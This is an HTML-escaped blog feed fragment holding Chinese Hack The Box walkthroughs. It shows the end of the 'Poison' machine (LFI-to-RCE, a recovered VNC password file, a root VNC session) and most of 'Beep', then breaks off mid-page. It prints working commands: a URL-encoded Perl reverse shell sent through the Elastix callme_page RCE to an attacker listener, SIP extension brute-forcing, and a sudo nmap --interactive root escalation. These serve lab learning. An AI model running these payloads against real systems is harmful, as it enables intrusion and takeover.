&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-text" data-lang="text">&lt;span class="line">&lt;span class="cl">https://github.com/roughiz/lfito_rce
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行脚本&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nc -lvp &lt;span class="m">23333&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">python2 lfito_rce.py -l &lt;span class="s2">&amp;#34;http://10.10.10.84/browse.php?file=&amp;#34;&lt;/span> --lhost 10.10.16.2 --lport &lt;span class="m">23333&lt;/span> -t &lt;span class="m">12&lt;/span> -i &lt;span class="s2">&amp;#34;http://10.10.10.84/phpinfo.php&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_lRX6Gj4DT7_hu658e4635f72e18686a3dc63e2ca9ffc8_221863_5b4fc3e616a2f837640d9fcd699b41d1.webp 400w,
/post/hackbox/poison/image/image_lRX6Gj4DT7_hu658e4635f72e18686a3dc63e2ca9ffc8_221863_e0349db83a3ea431cc7ad6d60ac64881.webp 760w,
/post/hackbox/poison/image/image_lRX6Gj4DT7_hu658e4635f72e18686a3dc63e2ca9ffc8_221863_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_lRX6Gj4DT7_hu658e4635f72e18686a3dc63e2ca9ffc8_221863_5b4fc3e616a2f837640d9fcd699b41d1.webp"
width="988"
height="924"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>已经拿到www权限。&lt;/p>
&lt;p>回到charix用户提权&lt;/p>
&lt;p>发现在charix用户目录下有个压缩包文件&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_NtguOATqA3_hubebf36fa196ad49cef4a7c450303bca7_6075_83c5e079a122f588b8aef7c8c6f12e56.webp 400w,
/post/hackbox/poison/image/image_NtguOATqA3_hubebf36fa196ad49cef4a7c450303bca7_6075_60aeca1a70e6b37a026821b9d44c480c.webp 760w,
/post/hackbox/poison/image/image_NtguOATqA3_hubebf36fa196ad49cef4a7c450303bca7_6075_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_NtguOATqA3_hubebf36fa196ad49cef4a7c450303bca7_6075_83c5e079a122f588b8aef7c8c6f12e56.webp"
width="503"
height="76"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>下载到本地&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">scp charix@10.10.10.84:~/secret.zip ./
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_A-VEtSsT7m_hu0063d1f080b8bcd1b435ffac0120d4cb_10544_981244a87ceda2850faf142a61626716.webp 400w,
/post/hackbox/poison/image/image_A-VEtSsT7m_hu0063d1f080b8bcd1b435ffac0120d4cb_10544_35073be5db03f580456c9582da243174.webp 760w,
/post/hackbox/poison/image/image_A-VEtSsT7m_hu0063d1f080b8bcd1b435ffac0120d4cb_10544_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_A-VEtSsT7m_hu0063d1f080b8bcd1b435ffac0120d4cb_10544_981244a87ceda2850faf142a61626716.webp"
width="990"
height="98"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>解压，发现密码就是之前登录的密码，&lt;code>Charix!2#4%6&amp;amp;8(0&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_htEVirFqzE_hu22cafc137b8e2ecb0c6ba4f97d9ed172_5523_1113cd976d0705403eceff97350a3086.webp 400w,
/post/hackbox/poison/image/image_htEVirFqzE_hu22cafc137b8e2ecb0c6ba4f97d9ed172_5523_f95ec1565d0d7224dfe68c5325903994.webp 760w,
/post/hackbox/poison/image/image_htEVirFqzE_hu22cafc137b8e2ecb0c6ba4f97d9ed172_5523_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_htEVirFqzE_hu22cafc137b8e2ecb0c6ba4f97d9ed172_5523_1113cd976d0705403eceff97350a3086.webp"
width="392"
height="92"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>乱码，不知道是什么，先暂时放着&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_n6-VXc884T_hua883aa5df5053abe7f50d55a670ff6a8_11429_f6ef79edc5916c060e27b0b810df6654.webp 400w,
/post/hackbox/poison/image/image_n6-VXc884T_hua883aa5df5053abe7f50d55a670ff6a8_11429_6fc92c8d13004baa099613e0081bb729.webp 760w,
/post/hackbox/poison/image/image_n6-VXc884T_hua883aa5df5053abe7f50d55a670ff6a8_11429_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_n6-VXc884T_hua883aa5df5053abe7f50d55a670ff6a8_11429_f6ef79edc5916c060e27b0b810df6654.webp"
width="574"
height="156"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ps -aux
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>发现Xvnc是以root权限运行&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_lV-1Y16Qae_hu3931e8b2558f50c02064ce82f1bd9a2a_101516_3b654fcd821f57edda6140596ab63c2e.webp 400w,
/post/hackbox/poison/image/image_lV-1Y16Qae_hu3931e8b2558f50c02064ce82f1bd9a2a_101516_f7b397c7535d6bc7443d24a958f3cc0a.webp 760w,
/post/hackbox/poison/image/image_lV-1Y16Qae_hu3931e8b2558f50c02064ce82f1bd9a2a_101516_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_lV-1Y16Qae_hu3931e8b2558f50c02064ce82f1bd9a2a_101516_3b654fcd821f57edda6140596ab63c2e.webp"
width="1001"
height="558"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;pre tabindex="0">&lt;code class="language-纯文本" data-lang="纯文本">ps -auxww |grep vnc
&lt;/code>&lt;/pre>&lt;p>vnc的端口是5901&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_9Gy9xugyxR_hu2f6f8e5fd272bd7525cee5f30a94d654_39979_8c59656090b2de219ed3c3262c88be1b.webp 400w,
/post/hackbox/poison/image/image_9Gy9xugyxR_hu2f6f8e5fd272bd7525cee5f30a94d654_39979_e5b85b892456e8151dcadc41badb3564.webp 760w,
/post/hackbox/poison/image/image_9Gy9xugyxR_hu2f6f8e5fd272bd7525cee5f30a94d654_39979_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_9Gy9xugyxR_hu2f6f8e5fd272bd7525cee5f30a94d654_39979_8c59656090b2de219ed3c3262c88be1b.webp"
width="993"
height="128"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;pre tabindex="0">&lt;code class="language-纯文本" data-lang="纯文本">netstat -an|grep LIST
&lt;/code>&lt;/pre>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_2rZkLhhUqg_hu7acaa242264ed60c32df354f05882af6_34338_1d793d879e86a5a8810ce0fa7ed0b7ef.webp 400w,
/post/hackbox/poison/image/image_2rZkLhhUqg_hu7acaa242264ed60c32df354f05882af6_34338_34805dc3411105e842ee0d1392378aae.webp 760w,
/post/hackbox/poison/image/image_2rZkLhhUqg_hu7acaa242264ed60c32df354f05882af6_34338_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_2rZkLhhUqg_hu7acaa242264ed60c32df354f05882af6_34338_1d793d879e86a5a8810ce0fa7ed0b7ef.webp"
width="779"
height="182"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>尝试登录vnc，需要将靶机5901端口转发到本地&lt;/p>
&lt;pre tabindex="0">&lt;code class="language-纯文本" data-lang="纯文本">ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
&lt;/code>&lt;/pre>&lt;p>搜了下发现登录vnc的密码也可以以文件的形式存在&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_VIBxjsKzhG_hu8f94440116f5ee1e04cf28f0e6346c41_29823_089e51d3b40a7c354e2d81bf13024d5d.webp 400w,
/post/hackbox/poison/image/image_VIBxjsKzhG_hu8f94440116f5ee1e04cf28f0e6346c41_29823_e8b90c8d64999caaa515c5affb5a157e.webp 760w,
/post/hackbox/poison/image/image_VIBxjsKzhG_hu8f94440116f5ee1e04cf28f0e6346c41_29823_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_VIBxjsKzhG_hu8f94440116f5ee1e04cf28f0e6346c41_29823_089e51d3b40a7c354e2d81bf13024d5d.webp"
width="991"
height="208"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>之前解压出来的secret文件应该就是密码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">vncviewer -passwd ./secret 127.0.0.1:5901
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录成功，并且是root权限&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/poison/image/image_wq_uhnAo4Z_hu3612b8bb997ea2cb41990cfbf6ede075_26957_47c0123898618a7ff8191010f7fb713c.webp 400w,
/post/hackbox/poison/image/image_wq_uhnAo4Z_hu3612b8bb997ea2cb41990cfbf6ede075_26957_c8a23c9543416ebf98a1bd7f5c2f5e69.webp 760w,
/post/hackbox/poison/image/image_wq_uhnAo4Z_hu3612b8bb997ea2cb41990cfbf6ede075_26957_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/poison/image/image_wq_uhnAo4Z_hu3612b8bb997ea2cb41990cfbf6ede075_26957_47c0123898618a7ff8191010f7fb713c.webp"
width="711"
height="365"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Beep</title><link>https://docs.kaiasec.tk/post/hackbox/beep/</link><pubDate>Thu, 12 May 2022 14:51:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/beep/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn -sS -n -p- -vv -sV 10.10.10.7
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_PuXk5LUva2_huc17227d11e90676203b5370a2b49c191_261481_290c79d26109d13bf5b576493d9bdbd8.webp 400w,
/post/hackbox/beep/image/image_PuXk5LUva2_huc17227d11e90676203b5370a2b49c191_261481_317ec350e94166c021056dbd51bba741.webp 760w,
/post/hackbox/beep/image/image_PuXk5LUva2_huc17227d11e90676203b5370a2b49c191_261481_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_PuXk5LUva2_huc17227d11e90676203b5370a2b49c191_261481_290c79d26109d13bf5b576493d9bdbd8.webp"
width="972"
height="581"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>80，443端口&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_YzJj-jq23J_hu6cf70c0c509a2d73c82fe87f9806ecae_336064_474dc4fd42772195e20ef4c8ee3aafdf.webp 400w,
/post/hackbox/beep/image/image_YzJj-jq23J_hu6cf70c0c509a2d73c82fe87f9806ecae_336064_bde9906759b53559b1a2ef2ce40c22a2.webp 760w,
/post/hackbox/beep/image/image_YzJj-jq23J_hu6cf70c0c509a2d73c82fe87f9806ecae_336064_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_YzJj-jq23J_hu6cf70c0c509a2d73c82fe87f9806ecae_336064_474dc4fd42772195e20ef4c8ee3aafdf.webp"
width="903"
height="551"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>不知道是什么版本，搜索一下，发现2.2.0存在rce漏洞&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_Vae78oiTnq_hu2ad5168911c0564aa77b1e36c487429d_51717_6736461bcc0ed1831c406ecc317c1670.webp 400w,
/post/hackbox/beep/image/image_Vae78oiTnq_hu2ad5168911c0564aa77b1e36c487429d_51717_213b1746e8e50103b445b9ede0b18aa6.webp 760w,
/post/hackbox/beep/image/image_Vae78oiTnq_hu2ad5168911c0564aa77b1e36c487429d_51717_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_Vae78oiTnq_hu2ad5168911c0564aa77b1e36c487429d_51717_6736461bcc0ed1831c406ecc317c1670.webp"
width="889"
height="433"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>python脚本地址&lt;/p>
&lt;p>&lt;a href="https://www.exploit-db.com/exploits/18650" title="https://www.exploit-db.com/exploits/18650" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/18650&lt;/a>&lt;/p>
&lt;p>漏洞原理：&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#https://seclists.org/fulldisclosure/2012/Mar/234&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#RCE exp:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">[&lt;/span>HOST&lt;span class="o">]&lt;/span>/recordings/misc/callme_page.php?action&lt;span class="o">=&lt;/span>c&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">callmenum&lt;/span>&lt;span class="o">=[&lt;/span>PHONENUMBER&lt;span class="o">]&lt;/span>@from-internal/n
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Application: system
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Data: &lt;span class="o">[&lt;/span>CMD&lt;span class="o">]&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>尝试执行一下，发现会报错，看了下脚本代码挺简单的，就是访问了一下https，然后poc里的Data值写了反弹shll的命令，这里直接通过curl访问一下这个URL&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">curl -k --tlsv1 &lt;span class="s1">&amp;#39;https://10.10.10.7/recordings/misc/callme_page.php?action=c&amp;amp;callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.16.2%3a23333%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#Decode&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">https://10.10.10.7/recordings/misc/callme_page.php?action&lt;span class="o">=&lt;/span>c&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">callmenum&lt;/span>&lt;span class="o">=&lt;/span>1000@from-internal/n
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Application: system
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Data: perl -MIO -e &lt;span class="s1">&amp;#39;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&amp;#34;10.10.16.2:23333&amp;#34;);STDIN-&amp;gt;fdopen($c,r);$~-&amp;gt;fdopen($c,w);system$_ while&amp;lt;&amp;gt;;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_9lV-WKw0fI_hu4e3f374986a1fc80efe2c721d1f66644_94376_bd9102b325fcd950611eedf4879929d0.webp 400w,
/post/hackbox/beep/image/image_9lV-WKw0fI_hu4e3f374986a1fc80efe2c721d1f66644_94376_df8a2dd90561d63f81129616a9e04450.webp 760w,
/post/hackbox/beep/image/image_9lV-WKw0fI_hu4e3f374986a1fc80efe2c721d1f66644_94376_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_9lV-WKw0fI_hu4e3f374986a1fc80efe2c721d1f66644_94376_bd9102b325fcd950611eedf4879929d0.webp"
width="1580"
height="558"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>报错，代码返回提示连接失败，查了下发现是sip 协议的&lt;code>extension&lt;/code> 不正确，意思是1000这个用户不正确，&lt;/p>
&lt;p>sip协议格式简介&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#https://blog.csdn.net/w0z1y/article/details/109352365&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#示例&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Via: SIP/2.0/TCP user1pc.domain.com&lt;span class="p">;&lt;/span>&lt;span class="nv">branch&lt;/span>&lt;span class="o">=&lt;/span>z9hG4bK776sgdkse
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">From: sip:user1@domain.com&lt;span class="p">;&lt;/span>&lt;span class="nv">tag&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">49583&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">To: sip:user2@domain.com
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Call-ID: asd88asd77a@1.2.3.4
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Max-Forwards: &lt;span class="m">70&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Contact: sip:192.168.100.1:1111
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Content-Type: text/plain；（application/sdp&lt;span class="p">;&lt;/span> application/cpim&lt;span class="p">;&lt;/span>）
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Content-Length: &lt;span class="m">18&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>kali的svwar工具是一个针对SIP协议的渗透工具，可以爆破用户名，也就是&lt;code>extension&lt;/code>值&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">svwar -m INVITE -e100-1000 10.10.10.7
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>扫描结果&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_XERgMZ9jrP_hu39487db9882b1d39cb42e21b20329eca_72006_c294ebc785bf56218411807c29c109b0.webp 400w,
/post/hackbox/beep/image/image_XERgMZ9jrP_hu39487db9882b1d39cb42e21b20329eca_72006_448d1e4835bb102eb284560374a763ff.webp 760w,
/post/hackbox/beep/image/image_XERgMZ9jrP_hu39487db9882b1d39cb42e21b20329eca_72006_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_XERgMZ9jrP_hu39487db9882b1d39cb42e21b20329eca_72006_c294ebc785bf56218411807c29c109b0.webp"
width="695"
height="520"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>将&lt;code>extension&lt;/code>改为233，重新请求&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">curl -k --tlsv1 &lt;span class="s1">&amp;#39;https://10.10.10.7/recordings/misc/callme_page.php?action=c&amp;amp;callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.16.2%3a23333%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#Decode&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">https://10.10.10.7/recordings/misc/callme_page.php?action&lt;span class="o">=&lt;/span>c&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">callmenum&lt;/span>&lt;span class="o">=&lt;/span>233@from-internal/n
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Application: system
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Data: perl -MIO -e &lt;span class="s1">&amp;#39;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&amp;#34;10.10.16.2:23333&amp;#34;);STDIN-&amp;gt;fdopen($c,r);$~-&amp;gt;fdopen($c,w);system$_ while&amp;lt;&amp;gt;;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>反弹shell成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_WkmWJsXpwr_hu31c57d56af5f30238dc8aa665e907150_46805_6cde5f18fe01b144d28c39d36bb16b00.webp 400w,
/post/hackbox/beep/image/image_WkmWJsXpwr_hu31c57d56af5f30238dc8aa665e907150_46805_e837d054978c783af547b871641ab762.webp 760w,
/post/hackbox/beep/image/image_WkmWJsXpwr_hu31c57d56af5f30238dc8aa665e907150_46805_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_WkmWJsXpwr_hu31c57d56af5f30238dc8aa665e907150_46805_6cde5f18fe01b144d28c39d36bb16b00.webp"
width="628"
height="211"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#whoami 当前用户&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#id 当前用户权限&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#sudo -l 查看有root权限的程序&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>居然有nmap，还是root权限，查看一下版本&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_gd6o-K2tTF_hu46a9fbbb54e22706582d82ea88082498_184424_7719af481a3677d20fcc73404ad82e69.webp 400w,
/post/hackbox/beep/image/image_gd6o-K2tTF_hu46a9fbbb54e22706582d82ea88082498_184424_dab86a8d1fb5abcd734b7c69826ffc5d.webp 760w,
/post/hackbox/beep/image/image_gd6o-K2tTF_hu46a9fbbb54e22706582d82ea88082498_184424_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_gd6o-K2tTF_hu46a9fbbb54e22706582d82ea88082498_184424_7719af481a3677d20fcc73404ad82e69.webp"
width="842"
height="598"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>nmap 2.02 - 5.21版本可以打开交互界面提权&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap --interactive
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">nmap&amp;gt;!sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>提权成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_L-kcQH7Se-_hu41f97c98e01ec007809efae312689eb6_38107_02a08b24e4588ab3d782e44672b883cd.webp 400w,
/post/hackbox/beep/image/image_L-kcQH7Se-_hu41f97c98e01ec007809efae312689eb6_38107_c617df86ea3bfe1721a55371c6d5c44f.webp 760w,
/post/hackbox/beep/image/image_L-kcQH7Se-_hu41f97c98e01ec007809efae312689eb6_38107_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_L-kcQH7Se-_hu41f97c98e01ec007809efae312689eb6_38107_02a08b24e4588ab3d782e44672b883cd.webp"
width="600"
height="227"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>其他思路&lt;/p>
&lt;p>本地文件包含漏洞&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">https://www.exploit-db.com/exploits/37637
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/beep/image/image_i5LJ7ASAyl_huc6702681ba0f91c8208120bdc360d0ab_52379_fc67918aa4b3688eb06dcfd450ce6f8c.webp 400w,
/post/hackbox/beep/image/image_i5LJ7ASAyl_huc6702681ba0f91c8208120bdc360d0ab_52379_a2006a2cfe90409b2433f50e9b11a695.webp 760w,
/post/hackbox/beep/image/image_i5LJ7ASAyl_huc6702681ba0f91c8208120bdc360d0ab_52379_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/beep/image/image_i5LJ7ASAyl_huc6702681ba0f91c8208120bdc360d0ab_52379_fc67918aa4b3688eb06dcfd450ce6f8c.webp"
width="997"
height="398"
